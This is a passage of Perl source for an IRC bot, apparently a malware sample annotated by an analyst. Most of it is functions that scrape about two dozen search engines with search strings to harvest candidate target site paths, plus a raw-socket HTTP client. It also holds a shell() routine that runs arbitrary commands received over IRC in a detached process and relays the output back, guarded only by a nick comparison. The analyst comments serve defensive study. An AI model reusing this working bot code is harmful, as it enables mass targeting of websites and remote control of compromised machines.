  # Pages with offsets 10,20,...,500 in the v:state parameter; stops early
  # when the response does not contain "next". Hosts are taken from
  # document-header links; entries matching yippy.com are skipped and the
  # rest go through links().
  1474. sub clusty() {
  1475. my @list;
  1476. my $key = $_[0];
  1477. my $b = 0;
  1478. for ($b=10; $b<=500; $b+=10) {
  1479. my $search = ("http://search.yippy.com/search?query=".&key($key)."&input-form=clusty-simple&v:sources=webplus&v:state=root|root-".$b."-10|0&");
  1480. my $res = &search_engine_query($search);
  1481. if ($res !~ /next/) {$b=500;}
  1482. while ($res =~ m/<div class=\"document-header\"><a href=\"http:\/\/(.*?)\"><span class=\"title\">/g) {
  1483. if ($1 !~ /yippy\.com/){
  1484. my $link = $1;
  1485. my @grep = &links($link);
  1486. push(@list,@grep);
  1487. }
  1488. }
  1489. }
  1490. return @list;
  1491. }
  1492.  
# gutser(): result harvester for www.goodsearch.com.
# Input:  $_[0] - search string, encoded by key().
# Output: flat list; each accepted result contributes the three links() variants.
# Analyst note: always issues 50 requests (pages 1 .. 50); no early-stop test.
# NOTE(review): $b is not declared with "my" in this sub, so the loop counter is
# the package variable $b rather than a lexical.
sub gutser() {
    my @list;
    my $key = $_[0];
    for ($b=1; $b<=50; $b+=1) {
        my $search = ("http://www.goodsearch.com/Search.aspx?Keywords=".&key($key)."&page=".$b."&osmax=0");
        my $res = &search_engine_query($search);
        # Very loose pattern: any "http://..." followed by `">` anywhere in the page.
        while ($res =~ m/http:\/\/([^>\"]*)\">/g) {
            # Drop the engine's own links and a few third-party hosts that appear on its pages.
            if ($1 !~ /goodsearch|good\.is|w3\.org|quantserve/){
                my $link = $1;
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}
  1509.  
# google2(): result harvester that queries one randomly chosen national Google domain.
# Input:  $_[0] - search string, encoded by key().
# Output: flat list; each accepted result contributes the three links() variants.
# Analyst note: 20 requests per call (start offsets 1 .. 191 in steps of 10),
# all to www.google.<suffix> for a single suffix picked from @doms.
# NOTE(review): "return @list" sits inside the foreach body, so the sub returns
# after the first iteration; the loop variable $domain is never used, and $dom
# is an undeclared package variable.
sub google2() {
    my @list;
    my $key = $_[0];
    my $b = 0;
    my @doms = ("ae","com.af","com.ag","off.ai","am","com.ar","as","at","com.au","az","ba","com.bd","be","bg","bi","com.bo","com.br","bs","co.bw","com.bz","ca","cd","cg","ch","ci","co.ck","cl","com.co","co.cr","com.cu","de","dj","dk","dm","com.do","com.ec","es","com.et","fi","com.fj","fm","fr","gg","com.gi","gl","gm","gr","com.gt","com.hk","hn","hr","co.hu","co.id","ie","co.il","co.im","co.in","is","it","co.je","com.jm","jo","co.jp","co.ke","kg","co.kr","kz","li","lk","co.ls","lt","lu","lv","com.ly","mn","ms","com.mt","mu","mw","com.mx","com.my","com.na","com.nf","com.ni","nl","no","com.np","nr","nu","co.nz","com.om","com.pa","com.pe","com.ph","com.pk","pl","pn","com.pr","pt","com.py","ro","ru","rw","com.sa","com.sb","sc","se","com.sg","sh","sk","sn","sm","com.sv","co.th","com.tj","tm","to","tp","com.tr","tt","com.tw","com.ua","co.ug","co.uk","com.uy","uz","com.vc","co.ve","vg","co.vi","com.vn","vu","ws","co.za","co.zm");
    # The suffix is drawn at random on each pass instead of using the loop variable.
    foreach my $domain (@doms) { $dom = $doms[rand(scalar(@doms))];
        for ($b=1; $b<=200; $b+=10) {
            my $search = ("http://www.google.".$dom."/search?num=50&q=".&key($key)."&start=".$b."&sa=N");
            my $res = &search_engine_query($search);
            # Capture the host/path of each anchor up to the last "/" before a quote or ">".
            while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
                # Drop the engine's own links.
                if ($1 !~ /google/){
                    my $link = $1;
                    my @grep = &links($link);
                    push(@list,@grep);
                }
            }
        # Closes the inner for loop, then returns from inside the foreach.
        } return @list;
    }
}
  1529.  
# exalead(): result harvester for www.exalead.com.
# Input:  $_[0] - search string, encoded by key().
# Output: flat list; each accepted result contributes the three links() variants.
# Analyst note: at most 11 requests (start_index 0 .. 1000 in steps of 100).
# NOTE(review): $b is the package variable here (no "my").
sub exalead() {
    my @list;
    my $key = $_[0];
    for ($b=0; $b<=1000; $b+=100) {
        my $search = ("http://www.exalead.com/search/web/results/?q=".&key($key)."&elements_per_page=100&start_index=".$b);
        my $res = &search_engine_query($search);
        # Paging stops when the "topNextUrl" element IS present - possibly an
        # inverted test, confirm against the engine's markup of the time.
        # The /g flag on this scalar-context match also leaves pos($res) just after
        # the marker, so the harvesting loop below resumes from that point.
        if ($res =~ m/<span id=\"topNextUrl\">/g) {$b=1000;}
        while ($res =~ m/<a class=\"thumbnail\" href=\"http:\/\/(.*?)\"/g) {
            my $link = $1;
            # Drop the engine's own links.
            if ($link!~ /exalead/){
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}
  1547.  
# lycos(): result harvester for search.lycos.com.
# Input:  $_[0] - search string, encoded by key().
# Output: flat list; each accepted result contributes the three links() variants.
# Analyst note: always issues 51 requests (page2 = 0 .. 50); no early-stop test.
# The fixed "diktfc" value in the URL is a constant string usable as a request indicator.
# NOTE(review): $b is the package variable here (no "my").
sub lycos() {
    my @list;
    my $key = $_[0];
    for ($b=0; $b<=50; $b+=1) {
        my $search = ("http://search.lycos.com/?query=".&key($key)."&page2=".$b."&tab=web&searchArea=web&diktfc=468007302EF7DB9AFE53D4138B848E7B4000D424385F");
        my $res = &search_engine_query($search);
        # Capture the href of anchors that carry an onmouseover handler.
        while ($res =~ m/href=\"http:\/\/(.+?)\" onmouseover=/g) {
            # Drop the engine's own links.
            if ($1 !~ /lycos\.com/){
                my $link = $1;
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}
  1564.  
# virgilio(): result harvester for ricerca.virgilio.it.
# Input:  $_[0] - search string, encoded by key().
# Output: flat list; each accepted result contributes the three links() variants.
# Analyst note: at most 50 requests (offsets 10 .. 500 in steps of 10).
# NOTE(review): $b is the package variable here (no "my").
sub virgilio() {
    my @list;
    my $key = $_[0];
    for ($b=10; $b<=500; $b+=10) {
        my $search = ("http://ricerca.virgilio.it/ricerca?qs=".&key($key)."&filter=1&site=&lr=&hits=10&offset=".$b);
        my $res = &search_engine_query($search);
        # Stop after this page on the "no results" message ...
        if ($res =~ m/non ha prodotto risultati/i) {$b=500;}
        # ... or on a second message, presumably the engine's notice that it has
        # flagged the traffic as automated requests - confirm.
        if ($res =~ m/riconducibile a richieste effettuate/i) {$b=500;}
        # Capture the href of anchors that carry a target attribute.
        while ($res =~ m/<a href=\"http:\/\/(.+?)\" target=\"/g) {
            # Drop the engine's own links.
            if ($1 !~ /\.virgilio\.it/){
                my $link = $1;
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}
  1583.  
# webde(): result harvester for suche.web.de.
# Input:  $_[0] - search string, encoded by key().
# Output: flat list; each accepted result contributes the three links() variants.
# Analyst note: at most 50 requests (pageIndex 1 .. 50).
# NOTE(review): $b is the package variable here (no "my").
sub webde() {
    my @list;
    my $key = $_[0];
    for ($b=1; $b<=50; $b+=1) {
        my $search = ("http://suche.web.de/search/web/?pageIndex=".$b."&su=".&key($key)."&search=Suche&webRb=countryDE");
        my $res = &search_engine_query($search);
        # Stop after this page on the German "search term not found" message.
        if ($res =~ m/Suchbegriff nicht gefunden/i) {$b=50;}
        # Results are read from the visible URL text inside <span class="url">.
        while ($res =~ m/<span class=\"url\">http:\/\/(.*?)<\/span>/g) {
            my $link = $1;
            # Broad filter: any result containing "suche" or "web" anywhere is dropped,
            # not only the engine's own host.
            if ($link!~ /suche|web/){
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}
  1601.  
# hotbot(): result harvester for www.hotbot.com using the "msn" provider parameter.
# Input:  $_[0] - search string, encoded by key().
# Output: flat list; each accepted result contributes the three links() variants.
# Analyst note: at most 51 requests (page 0 .. 50). The fixed "diktfc" value in
# the URL is a constant string usable as a request indicator.
# NOTE(review): $b is the package variable here (no "my").
sub hotbot() {
    my @list;
    my $key = $_[0];
    for ($b=0; $b<=50; $b+=1) {
        my $search = ("http://www.hotbot.com/?query=".&key($key)."&ps=&loc=searchbox&tab=web&mode=search&currProv=msn&page=".$b."&diktfc=51964BFDE35DFB6914F9E1E0D7988C3AC0ACB52B58BE");
        my $res = &search_engine_query($search);
        # Stop after this page when the engine reports no web results.
        if ($res =~ m/had no web result/i) {$b=50;}
        # Capture the href of rel="nofollow" anchors.
        while ($res =~ m/rel=\"nofollow\" href=\"http:\/\/(.+?)\"/g) {
            # Drop the engine's own links.
            if ($1 !~ /hotbot\.com/){
                my $link = $1;
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}
  1619.  
# aol(): result harvester for aim.search.aol.com.
# Input:  $_[0] - search string, encoded by key().
# Output: flat list; each accepted result contributes the three links() variants.
# Analyst note: always issues 49 requests (page 2 .. 50); page 1 is never
# requested and there is no early-stop test.
# NOTE(review): $b is the package variable here (no "my").
sub aol() {
    my @list;
    my $key = $_[0];
    for ($b=2; $b<=50; $b+=1) {
        my $search = ("http://aim.search.aol.com/aol/search?q=".&key($key)."&page=".$b);
        my $res = &search_engine_query($search);
        # Capture the href of anchors that are followed by a "property" attribute.
        while ($res =~ m/href=\"http:\/\/(.*?)\" property/g) {
            # Drop the engine's own links.
            if ($1 !~ /aol\.com/){
                my $link = $1;
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}
  1636.  
# sapo(): result harvester for pesquisa.sapo.pt.
# Input:  $_[0] - search string, encoded by key().
# Output: flat list; each accepted result contributes the three links() variants.
# Analyst note: at most 50 requests (page 1 .. 50).
# NOTE(review): $b is the package variable here (no "my").
sub sapo(){
    my @list;
    my $key = $_[0];
    for ($b=1; $b<=50; $b+=1) {
        my $search = ("http://pesquisa.sapo.pt/?barra=resumo&cluster=0&format=html&limit=10&location=pt&page=".$b."&q=".&key($key)."&st=local");
        my $res = &search_engine_query($search);
        # Stop after this page when "Next" (any case) does not occur in the response.
        if ($res !~ m/Next/i) {$b=50;}
        # Every absolute http anchor on the page is a candidate.
        while ($res =~ m/<a href=\"http:\/\/(.*?)\"/g) {
            # Drop the engine's own links.
            if ($1 !~ /\.sapo\.pt/){
                my $link = $1;
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}
  1654.  
# duck(): result harvester for duckduckgo.com (HTML endpoint).
# Input:  $_[0] - search string, encoded by key().
# Output: flat list; each accepted result contributes the three links() variants.
# Analyst note: at most 50 requests; the same counter is sent as both the "s"
# and the "dc" parameter.
sub duck() {
    my @list;
    my $key = $_[0];
    my $b = 0;
    for ($b=1; $b<=50; $b+=1) {
        my $search = ("http://duckduckgo.com/html/?q=".&key($key)."&t=A&l=en&p=1&s=".$b."&o=json&dc=".$b."&api=d.js");
        my $res = &search_engine_query($search);
        # Stop after this page when the engine reports the end of the result set.
        if ($res =~ m/No more results/i) {$b=50;}
        # Every absolute http anchor on the page is a candidate.
        while ($res =~ m/<a href=\"http:\/\/(.+?)\"/g) {
            # Drop the engine's own links.
            if ($1 !~ /duckduckgo/){
                my $link = $1;
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}
  1673.  
# lygo(): second harvester for www.hotbot.com, this time with currProv=lygo and
# the "page2" paging parameter (compare hotbot(), which uses currProv=msn).
# Input:  $_[0] - search string, encoded by key().
# Output: flat list; each accepted result contributes the three links() variants.
# Analyst note: at most 51 requests (page2 = 0 .. 50); same fixed "diktfc"
# value as hotbot().
sub lygo() {
    my @list;
    my $key = $_[0];
    my $b = 0;
    for ($b=0; $b<=50; $b+=1) {
        my $search = ("http://www.hotbot.com/?query=".&key($key)."&ps=&loc=searchbox&tab=web&mode=search&currProv=lygo&page2=".$b."&diktfc=51964BFDE35DFB6914F9E1E0D7988C3AC0ACB52B58BE");
        my $res = &search_engine_query($search);
        # Stop after this page when the engine reports no web results.
        if ($res =~ m/had no web result/i) {$b=50;}
        # Only anchors that wrap an <img> are captured.
        while ($res =~ m/<a href=\"http:\/\/(.+?)\"><img/g) {
            # Drop the engine's own links.
            if ($1 !~ /hotbot\.com/){
                my $link = $1;
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}
  1692.  
# yause(): result harvester for www.yauba.com.
# Input:  $_[0] - search string, encoded by key().
# Output: flat list; each accepted result contributes the three links() variants.
# Analyst note: at most 50 requests (pg = 1 .. 50).
sub yause() {
    my @list;
    my $key = $_[0];
    my $b = 0;
    for ($b=1; $b<=50; $b+=1) {
        my $search = ("http://www.yauba.com/?query=".&key($key)."&where=websites&target=websites&con=y&ilang=english&clt=topic&pg=".$b);
        my $res = &search_engine_query($search);
        # Stop after this page when "Next" (any case) does not occur in the response.
        if ($res !~ m/Next/i) {$b=50;}
        # Capture the href of result headings (<h1> with a rel="nofollow" anchor).
        while ($res =~ m/<h1><a rel=\"nofollow\" href=\"http:\/\/(.+?)\" onfocus=/g) {
            # Drop the engine's own links.
            if ($1 !~ /yauba\.com/){
                my $link = $1;
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}
  1711.  
# baidu(): result harvester for www.baidu.com.
# Input:  $_[0] - search string, encoded by key().
# Output: flat list; each accepted result contributes the three links() variants.
# Analyst note: always issues 51 requests (pn = 0 .. 500 in steps of 10); no
# early-stop test.
sub baidu() {
    my @list;
    my $key = $_[0];
    my $b = 0;
    for ($b=0; $b<=500; $b+=10) {
        my $search = ("http://www.baidu.com/s?wd=".&key($key)."&pn=".$b);
        my $res = &search_engine_query($search);
        # Capture hrefs that sit between another quoted attribute and a target attribute.
        while ($res =~ m/\" href=\"http:\/\/(.*?)\" target=/g) {
            # Drop the engine's own links.
            if ($1 !~ /baidu\.com/){
                my $link = $1;
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}
  1729.  
# kipot(): result harvester for www.qkport.com; page number and encoded search
# string are both carried in the URL path.
# Input:  $_[0] - search string, encoded by key().
# Output: flat list; each accepted result contributes the three links() variants.
# Analyst note: always issues 50 requests (pages 1 .. 50); no early-stop test.
sub kipot() {
    my @list;
    my $key = $_[0];
    my $b = 0;
    for ($b=1; $b<=50; $b+=1) {
        my $search = ("http://www.qkport.com/".$b."/web/".&key($key));
        my $res = &search_engine_query($search);
        # Capture the href of anchors with target="_top".
        while ($res =~ m/href=\"http:\/\/(.*?)\" target=\"_top\"/g) {
            # Drop the engine's own links.
            if ($1 !~ /qkport\.com/){
                my $link = $1;
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}
  1747.  
# gibla(): result harvester for www.gigablast.com that follows the page's own
# "next" link instead of counting pages.
# Input:  $_[0] - search string, encoded by key().
# Output: flat list; each result contributes the three links() variants.
# NOTE(review): unlike the other harvesters there is no page limit and no
# filter for the engine's own domain. The loop runs for as long as each
# response contains "Next 10 Results", and a final page without that text is
# never harvested.
sub gibla() { # original author tag: "mati" (presumably Indonesian for "dead", i.e. marked as not working - confirm)
    my @list;
    my $key = $_[0];
    my $hal = "/search?q=".&key($key);
    my $search = ("http://www.gigablast.com".$hal);
    my $res = &search_engine_query($search);
    while ($res =~ m/Next 10 Results/) {
        # The URL for the next fetch is built BEFORE $hal is refreshed below, so
        # the first pass re-requests the first page and each later pass is one
        # page behind the link just parsed.
        $search = ("http://www.gigablast.com".$hal);
        # Results are read from the visible URL text; no "http://" prefix is required here.
        while ($res =~ m/<span class=\"url\">(.+?)><\/span>/g) {
            my $link = $1;
            my @grep = &links($link);
            push(@list,@grep);
        }
        # Remember the first centred anchor as the path of the following page.
        if ($res =~ m/<center><a href=\"(.*?)\">/) { $hal = $1; }
        $res = &search_engine_query($search);
    }return @list;
}
  1765.  
# black(): result harvester for blekko.com.
# Input:  $_[0] - search string, encoded by key().
# Output: flat list; each accepted result contributes the three links() variants.
# Analyst note: at most 51 requests (p = 0 .. 50).
sub black() {
    my @list;
    my $key = $_[0];
    my $b = 0;
    for ($b=0; $b<=50; $b+=1) {
        my $search = ("http://blekko.com/ws/".&key($key)."?ft=&p=".$b);
        # NOTE(review): $cek is computed but never read; the test below uses $b.
        my $cek = $b+1;
        my $res = &search_engine_query($search);
        # Stop after this page unless the response shows the current counter
        # value in bold, i.e. "<strong>$b</strong>".
        if ($res !~ m/<strong>$b<\/strong>/i) {$b=50;}
        # Capture the href of anchors with class "UrlTitleLine".
        while ($res =~ m/class=\"UrlTitleLine\" href=\"http:\/\/(.+?)\"/g) {
            # Drop the engine's own links.
            if ($1 !~ /blekko/){
                my $link = $1;
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}
  1785.  
# onet(): result harvester for szukaj.onet.pl.
# Input:  $_[0] - search string, encoded by key().
# Output: flat list; each accepted result contributes the three links() variants.
# Analyst note: always issues 50 requests (pages 1 .. 50); no early-stop test.
sub onet() {
    my @list;
    my $key = $_[0];
    my $b = 0;
    for ($b=1; $b<=50; $b+=1) {
        my $search = ("http://szukaj.onet.pl/".$b.",query.html?qt=".&key($key));
        my $res = &search_engine_query($search);
        # Every absolute http anchor on the page is a candidate.
        while ($res =~ m/<a href=\"http:\/\/(.+?)\"/g) {
            # Only cache and query links are dropped; the engine's own host name
            # is not filtered as such.
            if ($1 !~ /webcache|query/){
                my $link = $1;
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}
  1803.  
# sizuka(): result harvester for www.szukacz.pl.
# Input:  $_[0] - search string, encoded by key().
# Output: flat list; each accepted result contributes the three links() variants.
# Analyst note: always issues 10 requests (start = 10 .. 100 in steps of 10);
# no early-stop test.
sub sizuka() {
    my @list;
    my $key = $_[0];
    my $b = 0;
    for ($b=10; $b<=100; $b+=10) {
        my $search = ("http://www.szukacz.pl/szukaj.aspx?ct=polska&pc=polska&q=".&key($key)."&start=".$b);
        my $res = &search_engine_query($search);
        # Targets are read from the title attribute of anchors, not from href.
        while ($res =~ m/<a title=\"http:\/\/(.+?)\"/g) {
            # Drop the engine's own links.
            if ($1 !~ /szukacz/){
                my $link = $1;
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}
  1821.  
# walla(): result harvester for search.walla.co.il.
# Input:  $_[0] - search string, encoded by key().
# Output: flat list; each accepted result contributes the three links() variants.
# Analyst note: always issues 51 requests (p = 0 .. 50); no early-stop test.
sub walla() {
    my @list;
    my $key = $_[0];
    my $b = 0;
    for ($b=0; $b<=50; $b+=1) {
        my $search = ("http://search.walla.co.il/?t=0&e=utf&q=".&key($key)."&p=".$b);
        my $res = &search_engine_query($search);
        # Capture the href of anchors inside <td class=sw> cells.
        while ($res =~ m/<td class=sw><a href=\"http:\/\/(.+?)\"/g) {
            # Drop the engine's own links.
            if ($1 !~ /walla\.co\.il/){
                my $link = $1;
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}
  1839.  
# demos(): result harvester for search.dmoz.org.
# Input:  $_[0] - search string, encoded by key().
# Output: flat list; each accepted result contributes the three links() variants.
# Analyst note: always issues 51 requests (start = 0 .. 500 in steps of 10);
# no early-stop test.
sub demos() {
    my @list;
    my $key = $_[0];
    my $b = 0;
    for ($b=0; $b<=500; $b+=10) {
        my $search = ("http://search.dmoz.org/search/search?q=".&key($key)."&start=".$b."&type=next&all=yes");
        my $res = &search_engine_query($search);
        # Every absolute http anchor on the page is a candidate.
        while ($res =~ m/<a href=\"http:\/\/(.+?)\"/g) {
            # Broad filter: any result containing "search" or "dmoz" is dropped.
            if ($1 !~ /search|dmoz/){
                my $link = $1;
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}
  1857.  
# rose(): result harvester for euroseek.com, repeated once per entry of @langs
# with a randomly drawn language code each time.
# Input:  $_[0] - search string, encoded by key().
# Output: flat list; each accepted result contributes the three links() variants.
# Analyst note: 14 passes x 4 offsets (0, 10, 20, 30) = 56 requests per call.
# NOTE(review): the loop variable $language is never used; $lang is picked at
# random, so languages can repeat or be missed. $lang is an undeclared package
# variable.
sub rose() {
    my @list;
    my $key = $_[0];
    my $b = 0;
    my @langs = ("de","nl","fi","ps","da","en","es","fr","it","no","sv","cs","pl","ru");
    foreach my $language (@langs) { $lang = $langs[rand(scalar(@langs))];
        for ($b=0; $b<=30; $b+=10) {
            my $search = ("http://euroseek.com/system/search.cgi?language=".$lang."&mode=internet&start=".$b."&string=".&key($key));
            my $res = &search_engine_query($search);
            # Capture the href of anchors that carry a class attribute.
            while ($res =~ m/<a href=\"http:\/\/(.+?)\" class=/g) {
                # Drop the engine's own links.
                if ($1 !~ /euroseek/){
                    my $link = $1;
                    my @grep = &links($link);
                    push(@list,@grep);
                }
            }
        }
    # Closes the foreach; unlike google2() the return is outside the loop.
    }return @list;
}
  1877.  
# seznam(): result harvester for search.seznam.cz.
# Input:  $_[0] - search string, encoded by key().
# Output: flat list; each accepted result contributes the three links() variants.
# Analyst note: always issues 50 requests (from = 1 .. 491 in steps of 10); the
# fixed "pId" value in the URL is a constant string usable as a request indicator.
# NOTE(review): $b is the package variable here (no "my").
sub seznam() {
    my @list;
    my $key = $_[0];
    for ($b=1; $b<=500; $b+=10) {
        my $search = ("http://search.seznam.cz/?q=".&key($key)."&count=10&pId=SkYLl2GXwV0CZZUQcglt&from=".$b);
        my $res = &search_engine_query($search);
        # Capture the href of anchors that are followed by a title attribute.
        while ($res =~ m/<a href=\"http:\/\/(.+?)\" title/g) {
            # Drop the engine's own links.
            if ($1 !~ /seznam/){
                my $link = $1;
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}
  1894.  
# tiscali(): result harvester for search.tiscali.it.
# Input:  $_[0] - search string, encoded by key().
# Output: flat list; each accepted result contributes the three links() variants.
# Analyst note: always issues 51 requests (start = 0 .. 500 in steps of 10);
# no early-stop test.
# NOTE(review): $b is the package variable here (no "my").
sub tiscali() {
    my @list;
    my $key = $_[0];
    for ($b=0; $b<=500; $b+=10) {
        my $search = ("http://search.tiscali.it/?tiscalitype=web&collection=web&start=".$b."&q=".&key($key));
        my $res = &search_engine_query($search);
        # Capture the href of anchors that are followed by an onclick handler.
        while ($res =~ m/<a href=\"http:\/\/(.+?)\" onclick/g) {
            # Drop the engine's own links.
            if ($1 !~ /tiscali/){
                my $link = $1;
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}
  1911.  
# naver(): result harvester for web.search.naver.com.
# Input:  $_[0] - search string, encoded by key().
# Output: flat list; each accepted result contributes the three links() variants.
# Analyst note: always issues 50 requests (start = 1 .. 491 in steps of 10);
# no early-stop test.
# NOTE(review): $b is the package variable here (no "my").
sub naver() {
    my @list;
    my $key = $_[0];
    for ($b=1; $b<=500; $b+=10) {
        # NOTE(review): the "&#9001;=all" fragment looks like "&lang=all" after the
        # paste site rendered "&lang" as an HTML entity - confirm against another
        # copy of the sample before using this URL as an indicator.
        my $search = ("http://web.search.naver.com/search.naver?where=webkr&query=".&key($key)."&docid=0&#9001;=all&f=&srcharea=all&st=s&fd=2&start=".$b."&display=10");
        my $res = &search_engine_query($search);
        # Every absolute http anchor on the page is a candidate.
        while ($res =~ m/<a href=\"http:\/\/(.+?)\"/g) {
            # Drop the engine's own links.
            if ($1 !~ /naver/){
                my $link = $1;
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}
  1928.  
  1929.  
  1930. #########################################
  1931.  
# clean(): normalise and de-duplicate a list of harvested strings.
# Input:  @_ - list of link strings.
# Output: the same strings with every run of "/" collapsed to a single "/",
#         first occurrence of each kept, original order preserved.
# NOTE(review): foreach aliases the elements of @_, so the s/// below also
# rewrites the caller's own variables where those are modifiable.
sub clean() {
    my @cln = ();
    # Seen-set keyed by the normalised string.
    my %visit = ();
    foreach my $element (@_) {
        $element =~ s/\/+/\//g;
        # Post-increment: false on first sight (keep), true on every repeat (skip).
        next if $visit{$element}++;
        push @cln, $element;
    }
    return @cln;
}
  1942.  
# key(): hand-rolled URL encoding of a search string for use in a query parameter.
# Input:  $_[0] - raw search string.
# Output: copy with spaces turned into "+" and a fixed set of punctuation
#         characters turned into their %XX form.
# NOTE(review): only the characters listed below are handled; anything else
# (for example "%", "#" or an existing "+") passes through unchanged. The
# substitution for "?" appears twice; the second one can no longer match.
sub key() {
    my $dork = $_[0];
    $dork =~ s/ /\+/g;
    $dork =~ s/:/\%3A/g;
    $dork =~ s/\//\%2F/g;
    $dork =~ s/\?/\%3F/g;
    $dork =~ s/&/\%26/g;
    $dork =~ s/\"/\%22/g;
    $dork =~ s/,/\%2C/g;
    $dork =~ s/\\/\%5C/g;
    $dork =~ s/@/\%40/g;
    $dork =~ s/\[/\%5B/g;
    $dork =~ s/\]/\%5D/g;
    # Duplicate of the "?" rule above; no "?" is left at this point.
    $dork =~ s/\?/\%3F/g;
    $dork =~ s/\=/\%3D/g;
    $dork =~ s/\|/\%7C/g;
    return $dork;
}
  1961.  
# links(): expand one harvested link into three candidate base paths.
# Input:  $_[0] - link text; the callers in this file pass what followed
#         "http://" in a result page, so presumably no scheme is present.
# Output: list of three strings, in this order: the link itself, the host part
#         only, and the link with its last path segment removed. Each gets a
#         trailing "/" and has "//" pairs collapsed to "/".
sub links() {
    my @list;
    my $link = $_[0];
    my $host = $_[0];
    my $hdir = $_[0];
    # Parent directory: cut everything from the last "/" onwards.
    $hdir =~ s/(.*)\/[^\/]*$/$1/;
    # Host: keep the leading run of host-name characters, drop the first "/" and the rest.
    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
    $host .= "/";
    $link .= "/";
    $hdir .= "/";
    # Single left-to-right pass over non-overlapping pairs, so "///" becomes "//".
    $host =~ s/\/\//\//g;
    $hdir =~ s/\/\//\//g;
    $link =~ s/\/\//\//g;
    push(@list,$link,$host,$hdir);
    return @list;
}
  1978.  
# search_engine_query(): minimal HTTP client used by every harvester in this file.
# Input:  $_[0] - absolute http:// URL.
# Output: the raw response (status line, headers and body) as one string with
#         the lines joined by the list separator, or "" when anything failed.
# Analyst note (network indicators, all visible below): plain TCP to port 80,
# request line "GET <path> HTTP/1.0", and exactly three headers in the order
# Host, "Accept: */*", User-Agent. The User-Agent value comes from $uagent,
# which is set outside this part of the file. No TLS, no redirects, no cookies.
sub search_engine_query($) {
    my $url = $_[0];
    $url =~ s/http:\/\///;
    my $host = $url;
    my $query = $url;
    my $page = "";
    $host =~ s/href=\"?http:\/\///;
    # Keep only the leading run of host-name characters.
    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
    # NOTE(review): $host is interpolated as a pattern without quoting, so its
    # dots match any character; only the first match is removed.
    $query =~ s/$host//;
    if ($query eq "") { $query = "/"; }
    # All errors are swallowed: $@ is never inspected after the eval.
    eval {
        # "return" here leaves the eval block only; the sub then returns the empty $page.
        my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return;
        print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: $uagent\r\n\r\n";
        # Reads until the peer closes the connection; no timeout is set here.
        my @pages = <$sock>;
        $page = "@pages";
        close($sock);
    };
    return $page;
}
  1998.  
  1999. #########################################
  2000.  
# shell(): run a command line on the host where the bot is running and relay
# its output over IRC.
# Input:  $_[0] - IRC target (nick or channel) that receives the output;
#         $_[1] - command line.
# Output: none; output lines are sent through msg().
# Analyst note: this is the arbitrary-command-execution primitive of the bot.
# The command is handed to the shell through backticks, so host-side evidence
# is a perl process spawning shell children from a double-forked (re-parented)
# process. Whether callers gate this behind isAdmin() is not visible in this
# part of the file.
sub shell() {
    my $path = $_[0];
    my $cmd = $_[1];
    # "cd" is handled in-process so that the working directory persists for later commands.
    if ($cmd =~ /cd (.*)/) {
        chdir("$1") || &msg("$path","4,1No such file or directory");
        return;
    }
    # Parent: wait for the first child, which exits immediately (see below).
    elsif ($pid = fork) { waitpid($pid, 0); }
    # First child forks again and exits, leaving the grandchild detached from the bot.
    else { if (fork) { exit; } else {
        # stderr (and fd 3) are folded into the captured output.
        my @output = `$cmd 2>&1 3>&1`;
        my $c = 0;
        foreach my $output (@output) {
            $c++;
            # chop removes the last character whatever it is (normally the newline).
            chop $output;
            &msg("$path","$output");
            # Pause two seconds after every five lines - presumably to stay under
            # the IRC server's flood limit.
            if ($c == 5) { $c = 0; sleep 2; }
        }
        exit;
    }}
}
  2021.  
# isAdmin(): decide whether an IRC nick is the bot's operator.
# Input:  $_[0] - nick to test.
# Output: 1 when the nick equals $admin exactly (case-sensitive), otherwise 0.
# Analyst note: the check is a plain string comparison on the nick; no
# hostmask, ident or password is examined in this routine.
sub isAdmin() {
    my $status = 0;
    my $nick = $_[0];
    if ($nick eq $admin) { $status = 1; }
    return $status;
}
  2028.  
# msg(): send an IRC PRIVMSG.
# Input:  $_[0] - target (nick or channel); $_[1] - message text.
# Does nothing unless exactly two arguments are given.
# The line is written through sendraw() on $IRC_cur_socket; both are defined
# outside this part of the file.
sub msg() {
    return unless $#_ == 1;
    sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]");
}
  2033.  
# nick(): send an IRC NICK command to change the bot's nickname.
# Input:  $_[0] - new nick. Does nothing unless exactly one argument is given.
# NOTE(review): sendraw() is called here with the line only, whereas msg()
# passes $IRC_cur_socket first; sendraw() is defined elsewhere, so whether it
# accepts both forms cannot be confirmed from here.
sub nick() {
    return unless $#_ == 0;
    sendraw("NICK $_[0]");
}
  2038.  
# notice(): send an IRC NOTICE.
# Input:  $_[0] - target (nick or channel); $_[1] - message text.
# Does nothing unless exactly two arguments are given.
# NOTE(review): sendraw() is called here with the line only, whereas msg()
# passes $IRC_cur_socket first; sendraw() is defined elsewhere, so whether it
